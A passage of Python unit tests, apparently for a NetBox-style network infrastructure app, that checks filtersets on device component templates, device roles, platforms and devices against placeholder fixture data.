manufacturer = Manufacturer.objects.create(name='Manufacturer 1', slug='manufacturer-1')
device_types = (
DeviceType(manufacturer=manufacturer, model='Model 1', slug='model-1'),
DeviceType(manufacturer=manufacturer, model='Model 2', slug='model-2'),
DeviceType(manufacturer=manufacturer, model='Model 3', slug='model-3'),
)
DeviceType.objects.bulk_create(device_types)
ConsolePortTemplate.objects.bulk_create((
ConsolePortTemplate(device_type=device_types[0], name='Console Port 1'),
ConsolePortTemplate(device_type=device_types[1], name='Console Port 2'),
ConsolePortTemplate(device_type=device_types[2], name='Console Port 3'),
))
def test_name(self):
params = {'name': ['Console Port 1', 'Console Port 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_devicetype_id(self):
device_types = DeviceType.objects.all()[:2]
params = {'devicetype_id': [device_types[0].pk, device_types[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
class ConsoleServerPortTemplateTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = ConsoleServerPortTemplate.objects.all()
filterset = ConsoleServerPortTemplateFilterSet
@classmethod
def setUpTestData(cls):
manufacturer = Manufacturer.objects.create(name='Manufacturer 1', slug='manufacturer-1')
device_types = (
DeviceType(manufacturer=manufacturer, model='Model 1', slug='model-1'),
DeviceType(manufacturer=manufacturer, model='Model 2', slug='model-2'),
DeviceType(manufacturer=manufacturer, model='Model 3', slug='model-3'),
)
DeviceType.objects.bulk_create(device_types)
ConsoleServerPortTemplate.objects.bulk_create((
ConsoleServerPortTemplate(device_type=device_types[0], name='Console Server Port 1'),
ConsoleServerPortTemplate(device_type=device_types[1], name='Console Server Port 2'),
ConsoleServerPortTemplate(device_type=device_types[2], name='Console Server Port 3'),
))
def test_name(self):
params = {'name': ['Console Server Port 1', 'Console Server Port 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_devicetype_id(self):
device_types = DeviceType.objects.all()[:2]
params = {'devicetype_id': [device_types[0].pk, device_types[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
class PowerPortTemplateTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = PowerPortTemplate.objects.all()
filterset = PowerPortTemplateFilterSet
@classmethod
def setUpTestData(cls):
manufacturer = Manufacturer.objects.create(name='Manufacturer 1', slug='manufacturer-1')
device_types = (
DeviceType(manufacturer=manufacturer, model='Model 1', slug='model-1'),
DeviceType(manufacturer=manufacturer, model='Model 2', slug='model-2'),
DeviceType(manufacturer=manufacturer, model='Model 3', slug='model-3'),
)
DeviceType.objects.bulk_create(device_types)
PowerPortTemplate.objects.bulk_create((
PowerPortTemplate(device_type=device_types[0], name='Power Port 1', maximum_draw=100, allocated_draw=50),
PowerPortTemplate(device_type=device_types[1], name='Power Port 2', maximum_draw=200, allocated_draw=100),
PowerPortTemplate(device_type=device_types[2], name='Power Port 3', maximum_draw=300, allocated_draw=150),
))
def test_name(self):
params = {'name': ['Power Port 1', 'Power Port 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_devicetype_id(self):
device_types = DeviceType.objects.all()[:2]
params = {'devicetype_id': [device_types[0].pk, device_types[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_maximum_draw(self):
params = {'maximum_draw': [100, 200]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_allocated_draw(self):
params = {'allocated_draw': [50, 100]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
class PowerOutletTemplateTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = PowerOutletTemplate.objects.all()
filterset = PowerOutletTemplateFilterSet
@classmethod
def setUpTestData(cls):
manufacturer = Manufacturer.objects.create(name='Manufacturer 1', slug='manufacturer-1')
device_types = (
DeviceType(manufacturer=manufacturer, model='Model 1', slug='model-1'),
DeviceType(manufacturer=manufacturer, model='Model 2', slug='model-2'),
DeviceType(manufacturer=manufacturer, model='Model 3', slug='model-3'),
)
DeviceType.objects.bulk_create(device_types)
PowerOutletTemplate.objects.bulk_create((
PowerOutletTemplate(device_type=device_types[0], name='Power Outlet 1', feed_leg=PowerOutletFeedLegChoices.FEED_LEG_A),
PowerOutletTemplate(device_type=device_types[1], name='Power Outlet 2', feed_leg=PowerOutletFeedLegChoices.FEED_LEG_B),
PowerOutletTemplate(device_type=device_types[2], name='Power Outlet 3', feed_leg=PowerOutletFeedLegChoices.FEED_LEG_C),
))
def test_name(self):
params = {'name': ['Power Outlet 1', 'Power Outlet 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_devicetype_id(self):
device_types = DeviceType.objects.all()[:2]
params = {'devicetype_id': [device_types[0].pk, device_types[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_feed_leg(self):
params = {'feed_leg': [PowerOutletFeedLegChoices.FEED_LEG_A, PowerOutletFeedLegChoices.FEED_LEG_B]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
class InterfaceTemplateTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = InterfaceTemplate.objects.all()
filterset = InterfaceTemplateFilterSet
@classmethod
def setUpTestData(cls):
manufacturer = Manufacturer.objects.create(name='Manufacturer 1', slug='manufacturer-1')
device_types = (
DeviceType(manufacturer=manufacturer, model='Model 1', slug='model-1'),
DeviceType(manufacturer=manufacturer, model='Model 2', slug='model-2'),
DeviceType(manufacturer=manufacturer, model='Model 3', slug='model-3'),
)
DeviceType.objects.bulk_create(device_types)
InterfaceTemplate.objects.bulk_create((
InterfaceTemplate(device_type=device_types[0], name='Interface 1', type=InterfaceTypeChoices.TYPE_1GE_FIXED, mgmt_only=True),
InterfaceTemplate(device_type=device_types[1], name='Interface 2', type=InterfaceTypeChoices.TYPE_1GE_GBIC, mgmt_only=False),
InterfaceTemplate(device_type=device_types[2], name='Interface 3', type=InterfaceTypeChoices.TYPE_1GE_SFP, mgmt_only=False),
))
def test_name(self):
params = {'name': ['Interface 1', 'Interface 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_devicetype_id(self):
device_types = DeviceType.objects.all()[:2]
params = {'devicetype_id': [device_types[0].pk, device_types[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_type(self):
params = {'type': [InterfaceTypeChoices.TYPE_1GE_FIXED, InterfaceTypeChoices.TYPE_1GE_GBIC]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_mgmt_only(self):
params = {'mgmt_only': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
params = {'mgmt_only': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
class FrontPortTemplateTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = FrontPortTemplate.objects.all()
filterset = FrontPortTemplateFilterSet
@classmethod
def setUpTestData(cls):
manufacturer = Manufacturer.objects.create(name='Manufacturer 1', slug='manufacturer-1')
device_types = (
DeviceType(manufacturer=manufacturer, model='Model 1', slug='model-1'),
DeviceType(manufacturer=manufacturer, model='Model 2', slug='model-2'),
DeviceType(manufacturer=manufacturer, model='Model 3', slug='model-3'),
)
DeviceType.objects.bulk_create(device_types)
rear_ports = (
RearPortTemplate(device_type=device_types[0], name='Rear Port 1', type=PortTypeChoices.TYPE_8P8C),
RearPortTemplate(device_type=device_types[1], name='Rear Port 2', type=PortTypeChoices.TYPE_8P8C),
RearPortTemplate(device_type=device_types[2], name='Rear Port 3', type=PortTypeChoices.TYPE_8P8C),
)
RearPortTemplate.objects.bulk_create(rear_ports)
FrontPortTemplate.objects.bulk_create((
FrontPortTemplate(device_type=device_types[0], name='Front Port 1', rear_port=rear_ports[0], type=PortTypeChoices.TYPE_8P8C, color=ColorChoices.COLOR_RED),
FrontPortTemplate(device_type=device_types[1], name='Front Port 2', rear_port=rear_ports[1], type=PortTypeChoices.TYPE_110_PUNCH, color=ColorChoices.COLOR_GREEN),
FrontPortTemplate(device_type=device_types[2], name='Front Port 3', rear_port=rear_ports[2], type=PortTypeChoices.TYPE_BNC, color=ColorChoices.COLOR_BLUE),
))
def test_name(self):
params = {'name': ['Front Port 1', 'Front Port 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_devicetype_id(self):
device_types = DeviceType.objects.all()[:2]
params = {'devicetype_id': [device_types[0].pk, device_types[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_type(self):
params = {'type': [PortTypeChoices.TYPE_8P8C, PortTypeChoices.TYPE_110_PUNCH]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_color(self):
params = {'color': [ColorChoices.COLOR_RED, ColorChoices.COLOR_GREEN]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
class RearPortTemplateTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = RearPortTemplate.objects.all()
filterset = RearPortTemplateFilterSet
@classmethod
def setUpTestData(cls):
manufacturer = Manufacturer.objects.create(name='Manufacturer 1', slug='manufacturer-1')
device_types = (
DeviceType(manufacturer=manufacturer, model='Model 1', slug='model-1'),
DeviceType(manufacturer=manufacturer, model='Model 2', slug='model-2'),
DeviceType(manufacturer=manufacturer, model='Model 3', slug='model-3'),
)
DeviceType.objects.bulk_create(device_types)
RearPortTemplate.objects.bulk_create((
RearPortTemplate(device_type=device_types[0], name='Rear Port 1', type=PortTypeChoices.TYPE_8P8C, color=ColorChoices.COLOR_RED, positions=1),
RearPortTemplate(device_type=device_types[1], name='Rear Port 2', type=PortTypeChoices.TYPE_110_PUNCH, color=ColorChoices.COLOR_GREEN, positions=2),
RearPortTemplate(device_type=device_types[2], name='Rear Port 3', type=PortTypeChoices.TYPE_BNC, color=ColorChoices.COLOR_BLUE, positions=3),
))
def test_name(self):
params = {'name': ['Rear Port 1', 'Rear Port 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_devicetype_id(self):
device_types = DeviceType.objects.all()[:2]
params = {'devicetype_id': [device_types[0].pk, device_types[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_type(self):
params = {'type': [PortTypeChoices.TYPE_8P8C, PortTypeChoices.TYPE_110_PUNCH]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_color(self):
params = {'color': [ColorChoices.COLOR_RED, ColorChoices.COLOR_GREEN]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_positions(self):
params = {'positions': [1, 2]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
class DeviceBayTemplateTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = DeviceBayTemplate.objects.all()
filterset = DeviceBayTemplateFilterSet
@classmethod
def setUpTestData(cls):
manufacturer = Manufacturer.objects.create(name='Manufacturer 1', slug='manufacturer-1')
device_types = (
DeviceType(manufacturer=manufacturer, model='Model 1', slug='model-1'),
DeviceType(manufacturer=manufacturer, model='Model 2', slug='model-2'),
DeviceType(manufacturer=manufacturer, model='Model 3', slug='model-3'),
)
DeviceType.objects.bulk_create(device_types)
DeviceBayTemplate.objects.bulk_create((
DeviceBayTemplate(device_type=device_types[0], name='Device Bay 1'),
DeviceBayTemplate(device_type=device_types[1], name='Device Bay 2'),
DeviceBayTemplate(device_type=device_types[2], name='Device Bay 3'),
))
def test_name(self):
params = {'name': ['Device Bay 1', 'Device Bay 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_devicetype_id(self):
device_types = DeviceType.objects.all()[:2]
params = {'devicetype_id': [device_types[0].pk, device_types[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
class DeviceRoleTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = DeviceRole.objects.all()
filterset = DeviceRoleFilterSet
@classmethod
def setUpTestData(cls):
device_roles = (
DeviceRole(name='Device Role 1', slug='device-role-1', color='ff0000', vm_role=True, description='foobar1'),
DeviceRole(name='Device Role 2', slug='device-role-2', color='00ff00', vm_role=True, description='foobar2'),
DeviceRole(name='Device Role 3', slug='device-role-3', color='0000ff', vm_role=False),
)
DeviceRole.objects.bulk_create(device_roles)
def test_name(self):
params = {'name': ['Device Role 1', 'Device Role 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_slug(self):
params = {'slug': ['device-role-1', 'device-role-2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_color(self):
params = {'color': ['ff0000', '00ff00']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_vm_role(self):
params = {'vm_role': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'vm_role': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_description(self):
params = {'description': ['foobar1', 'foobar2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
class PlatformTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = Platform.objects.all()
filterset = PlatformFilterSet
@classmethod
def setUpTestData(cls):
manufacturers = (
Manufacturer(name='Manufacturer 1', slug='manufacturer-1'),
Manufacturer(name='Manufacturer 2', slug='manufacturer-2'),
Manufacturer(name='Manufacturer 3', slug='manufacturer-3'),
)
Manufacturer.objects.bulk_create(manufacturers)
platforms = (
Platform(name='Platform 1', slug='platform-1', manufacturer=manufacturers[0], napalm_driver='driver-1', description='A'),
Platform(name='Platform 2', slug='platform-2', manufacturer=manufacturers[1], napalm_driver='driver-2', description='B'),
Platform(name='Platform 3', slug='platform-3', manufacturer=manufacturers[2], napalm_driver='driver-3', description='C'),
)
Platform.objects.bulk_create(platforms)
def test_name(self):
params = {'name': ['Platform 1', 'Platform 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_slug(self):
params = {'slug': ['platform-1', 'platform-2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_description(self):
params = {'description': ['A', 'B']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_napalm_driver(self):
params = {'napalm_driver': ['driver-1', 'driver-2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_manufacturer(self):
manufacturers = Manufacturer.objects.all()[:2]
params = {'manufacturer_id': [manufacturers[0].pk, manufacturers[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'manufacturer': [manufacturers[0].slug, manufacturers[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
class DeviceTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = Device.objects.all()
filterset = DeviceFilterSet
@classmethod
def setUpTestData(cls):
manufacturers = (
Manufacturer(name='Manufacturer 1', slug='manufacturer-1'),
Manufacturer(name='Manufacturer 2', slug='manufacturer-2'),
Manufacturer(name='Manufacturer 3', slug='manufacturer-3'),
)
Manufacturer.objects.bulk_create(manufacturers)
device_types = (
DeviceType(manufacturer=manufacturers[0], model='Model 1', slug='model-1', is_full_depth=True),
DeviceType(manufacturer=manufacturers[1], model='Model 2', slug='model-2', is_full_depth=True),
DeviceType(manufacturer=manufacturers[2], model='Model 3', slug='model-3', is_full_depth=False),
)
DeviceType.objects.bulk_create(device_types)
device_roles = (
DeviceRole(name='Device Role 1', slug='device-role-1'),
DeviceRole(name='Device Role 2', slug='device-role-2'),
DeviceRole(name='Device Role 3', slug='device-role-3'),
)
DeviceRole.objects.bulk_create(device_roles)
platforms = (
Platform(name='Platform 1', slug='platform-1'),
Platform(name='Platform 2', slug='platform-2'),
Platform(name='Platform 3', slug='platform-3'),
)
Platform.objects.bulk_create(platforms)
regions = (
Region(name='Region 1', slug='region-1'),
Region(name='Region 2', slug='region-2'),
Region(name='Region 3', slug='region-3'),
)
for region in regions:
region.save()
groups = (
SiteGroup(name='Site Group 1', slug='site-group-1'),
SiteGroup(name='Site Group 2', slug='site-group-2'),
SiteGroup(name='Site Group 3', slug='site-group-3'),
)
for group in groups:
group.save()
sites = (
Site(name='Site 1', slug='site-1', region=regions[0], group=groups[0]),
Site(name='Site 2', slug='site-2', region=regions[1], group=groups[1]),
Site(name='Site 3', slug='site-3', region=regions[2], group=groups[2]),
)
Site.objects.bulk_create(sites)
locations = (
Location(name='Location 1', slug='location-1', site=sites[0]),
Location(name='Location 2', slug='location-2', site=sites[1]),
Location(name='Location 3', slug='location-3', site=sites[2]),
)
for location in locations:
location.save()
racks = (
Rack(name='Rack 1', site=sites[0], location=locations[0]),
Rack(name='Rack 2', site=sites[1], location=locations[1]),
Rack(name='Rack 3', site=sites[2], location=locations[2]),
)
Rack.objects.bulk_create(racks)
cluster_type = ClusterType.objects.create(name='Cluster Type 1', slug='cluster-type-1')
clusters = (
Cluster(name='Cluster 1', type=cluster_type),
Cluster(name='Cluster 2', type=cluster_type),
Cluster(name='Cluster 3', type=cluster_type),
)
Cluster.objects.bulk_create(clusters)
tenant_groups = (
TenantGroup(name='Tenant group 1', slug='tenant-group-1'),
TenantGroup(name='Tenant group 2', slug='tenant-group-2'),
TenantGroup(name='Tenant group 3', slug='tenant-group-3'),
)
for tenantgroup in tenant_groups:
tenantgroup.save()
tenants = (
Tenant(name='Tenant 1', slug='tenant-1', group=tenant_groups[0]),
Tenant(name='Tenant 2', slug='tenant-2', group=tenant_groups[1]),
Tenant(name='Tenant 3', slug='tenant-3', group=tenant_groups[2]),
)
Tenant.objects.bulk_create(tenants)
devices = (
Device(name='Device 1', device_type=device_types[0], device_role=device_roles[0], platform=platforms[0], tenant=tenants[0], serial='ABC', asset_tag='1001', site=sites[0], location=locations[0], rack=racks[0], position=1, face=DeviceFaceChoices.FACE_FRONT, status=DeviceStatusChoices.STATUS_ACTIVE, cluster=clusters[0], local_context_data={"foo": 123}),
Device(name='Device 2', device_type=device_types[1], device_role=device_roles[1], platform=platforms[1], tenant=tenants[1], serial='DEF', asset_tag='1002', site=sites[1], location=locations[1], rack=racks[1], position=2, face=DeviceFaceChoices.FACE_FRONT, status=DeviceStatusChoices.STATUS_STAGED, airflow=DeviceAirflowChoices.AIRFLOW_FRONT_TO_REAR, cluster=clusters[1]),
Device(name='Device 3', device_type=device_types[2], device_role=device_roles[2], platform=platforms[2], tenant=tenants[2], serial='GHI', asset_tag='1003', site=sites[2], location=locations[2], rack=racks[2], position=3, face=DeviceFaceChoices.FACE_REAR, status=DeviceStatusChoices.STATUS_FAILED, airflow=DeviceAirflowChoices.AIRFLOW_REAR_TO_FRONT, cluster=clusters[2]),
)
Device.objects.bulk_create(devices)
# Add components for filtering
ConsolePort.objects.bulk_create((
ConsolePort(device=devices[0], name='Console Port 1'),
ConsolePort(device=devices[1], name='Console Port 2'),
))
ConsoleServerPort.objects.bulk_create((
ConsoleServerPort(device=devices[0], name='Console Server Port 1'),
ConsoleServerPort(device=devices[1], name='Console Server Port 2'),
))
PowerPort.objects.bulk_create((
PowerPort(device=devices[0], name='Power Port 1'),
PowerPort(device=devices[1], name='Power Port 2'),
))
PowerOutlet.objects.bulk_create((
PowerOutlet(device=devices[0], name='Power Outlet 1'),
PowerOutlet(device=devices[1], name='Power Outlet 2'),
))
interfaces = (
Interface(device=devices[0], name='Interface 1', mac_address='00-00-00-00-00-01'),
Interface(device=devices[1], name='Interface 2', mac_address='00-00-00-00-00-02'),
)
Interface.objects.bulk_create(interfaces)
rear_ports = (
RearPort(device=devices[0], name='Rear Port 1', type=PortTypeChoices.TYPE_8P8C),
RearPort(device=devices[1], name='Rear Port 2', type=PortTypeChoices.TYPE_8P8C),
)
RearPort.objects.bulk_create(rear_ports)
FrontPort.objects.bulk_create((
FrontPort(device=devices[0], name='Front Port 1', type=PortTypeChoices.TYPE_8P8C, rear_port=rear_ports[0]),
FrontPort(device=devices[1], name='Front Port 2', type=PortTypeChoices.TYPE_8P8C, rear_port=rear_ports[1]),
))
DeviceBay.objects.bulk_create((
DeviceBay(device=devices[0], name='Device Bay 1'),
DeviceBay(device=devices[1], name='Device Bay 2'),
))
# Assign primary IPs for filtering
ipaddresses = (
IPAddress(address='192.0.2.1/24', assigned_object=interfaces[0]),
IPAddress(address='192.0.2.2/24', assigned_object=interfaces[1]),
)
IPAddress.objects.bulk_create(ipaddresses)
Device.objects.filter(pk=devices[0].pk).update(primary_ip4=ipaddresses[0])
Device.objects.filter(pk=devices[1].pk).update(primary_ip4=ipaddresses[1])
# VirtualChassis assignment for filtering
virtual_chassis = VirtualChassis.objects.create(master=devices[0])
Device.objects.filter(pk=devices[0].pk).update(virtual_chassis=virtual_chassis, vc_position=1, vc_priority=1)
Device.objects.filter(pk=devices[1].pk).update(virtual_chassis=virtual_chassis, vc_position=2, vc_priority=2)
def test_name(self):
params = {'name': ['Device 1', 'Device 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_asset_tag(self):
params = {'asset_tag': ['1001', '1002']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_face(self):
params = {'face': DeviceFaceChoices.FACE_FRONT}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_position(self):
params = {'position': [1, 2]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_vc_position(self):
params = {'vc_position': [1, 2]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_vc_priority(self):
params = {'vc_priority': [1, 2]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_manufacturer(self):
manufacturers = Manufacturer.objects.all()[:2]
params = {'manufacturer_id': [manufacturers[0].pk, manufacturers[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'manufacturer': [manufacturers[0].slug, manufacturers[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_devicetype(self):
device_types = DeviceType.objects.all()[:2]
params = {'device_type_id': [device_types[0].pk, device_types[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_devicerole(self):
device_roles = DeviceRole.objects.all()[:2]
params = {'role_id': [device_roles[0].pk, device_roles[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'role': [device_roles[0].slug, device_roles[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_platform(self):
platforms = Platform.objects.all()[:2]
params = {'platform_id': [platforms[0].pk, platforms[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'platform': [platforms[0].slug, platforms[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_region(self):
regions = Region.objects.all()[:2]
params = {'region_id': [regions[0].pk, regions[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'region': [regions[0].slug, regions[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site_group(self):
site_groups = SiteGroup.objects.all()[:2]
params = {'site_group_id': [site_groups[0].pk, site_groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site_group': [site_groups[0].slug, site_groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site(self):
sites = Site.objects.all()[:2]
params = {'site_id': [sites[0].pk, sites[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site': [sites[0].slug, sites[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_location(self):
locations = Location.objects.all()[:2]
params = {'location_id': [locations[0].pk, locations[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_rack(self):
racks = Rack.objects.all()[:2]
params = {'rack_id': [racks[0].pk, racks[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_cluster(self):
clusters = Cluster.objects.all()[:2]
params = {'cluster_id': [clusters[0].pk, clusters[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_model(self):
params = {'model': ['model-1', 'model-2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_status(self):
params = {'status': [DeviceStatusChoices.STATUS_ACTIVE, DeviceStatusChoices.STATUS_STAGED]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_is_full_depth(self):
params = {'is_full_depth': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'is_full_depth': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_airflow(self):
params = {'airflow': DeviceAirflowChoices.AIRFLOW_FRONT_TO_REAR}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_mac_address(self):
params = {'mac_address': ['00-00-00-00-00-01', '00-00-00-00-00-02']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_serial(self):
params = {'serial': ['ABC', 'DEF']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'serial': ['abc', 'def']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_has_primary_ip(self):
params = {'has_primary_ip': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'has_primary_ip': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_virtual_chassis_id(self):
params = {'virtual_chassis_id': [VirtualChassis.objects.first().pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_virtual_chassis_member(self):
params = {'virtual_chassis_member': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'virtual_chassis_member': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_console_ports(self):
params = {'console_ports': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'console_ports': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_console_server_ports(self):
params = {'console_server_ports': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'console_server_ports': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_power_ports(self):
params = {'power_ports': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'power_ports': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_power_outlets(self):
params = {'power_outlets': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'power_outlets': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_interfaces(self):
params = {'interfaces': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'interfaces': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_pass_through_ports(self):
params = {'pass_through_ports': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'pass_through_ports': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_device_bays(self):
params = {'device_bays': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'device_bays': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_local_context_data(self):
params = {'local_context_data': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
params = {'local_context_data': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_tenant(self):
tenants = Tenant.objects.all()[:2]
params = {'tenant_id': [tenants[0].pk, tenants[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'tenant': [tenants[0].slug, tenants[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_tenant_group(self):
tenant_groups = TenantGroup.objects.all()[:2]
params = {'tenant_group_id': [tenant_groups[0].pk, tenant_groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'tenant_group': [tenant_groups[0].slug, tenant_groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
class ConsolePortTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = ConsolePort.objects.all()
filterset = ConsolePortFilterSet
@classmethod
def setUpTestData(cls):
regions = (
Region(name='Region 1', slug='region-1'),
Region(name='Region 2', slug='region-2'),
Region(name='Region 3', slug='region-3'),
)
for region in regions:
region.save()
groups = (
SiteGroup(name='Site Group 1', slug='site-group-1'),
SiteGroup(name='Site Group 2', slug='site-group-2'),
SiteGroup(name='Site Group 3', slug='site-group-3'),
)
for group in groups:
group.save()
sites = Site.objects.bulk_create((
Site(name='Site 1', slug='site-1', region=regions[0], group=groups[0]),
Site(name='Site 2', slug='site-2', region=regions[1], group=groups[1]),
Site(name='Site 3', slug='site-3', region=regions[2], group=groups[2]),
Site(name='Site X', slug='site-x'),
))
manufacturer = Manufacturer.objects.create(name='Manufacturer 1', slug='manufacturer-1')
device_type = DeviceType.objects.create(manufacturer=manufacturer, model='Model 1', slug='model-1')
device_role = DeviceRole.objects.create(name='Device Role 1', slug='device-role-1')
locations = (
Location(name='Location 1', slug='location-1', site=sites[0]),
Location(name='Location 2', slug='location-2', site=sites[1]),
Location(name='Location 3', slug='location-3', site=sites[2]),
)
for location in locations:
location.save()
devices = (
Device(name='Device 1', device_type=device_type, device_role=device_role, site=sites[0], location=locations[0]),
Device(name='Device 2', device_type=device_type, device_role=device_role, site=sites[1], location=locations[1]),
Device(name='Device 3', device_type=device_type, device_role=device_role, site=sites[2], location=locations[2]),
Device(name=None, device_type=device_type, device_role=device_role, site=sites[3]), # For cable connections
)
Device.objects.bulk_create(devices)
console_server_ports = (
ConsoleServerPort(device=devices[3], name='Console Server Port 1'),
ConsoleServerPort(device=devices[3], name='Console Server Port 2'),
)
ConsoleServerPort.objects.bulk_create(console_server_ports)
console_ports = (
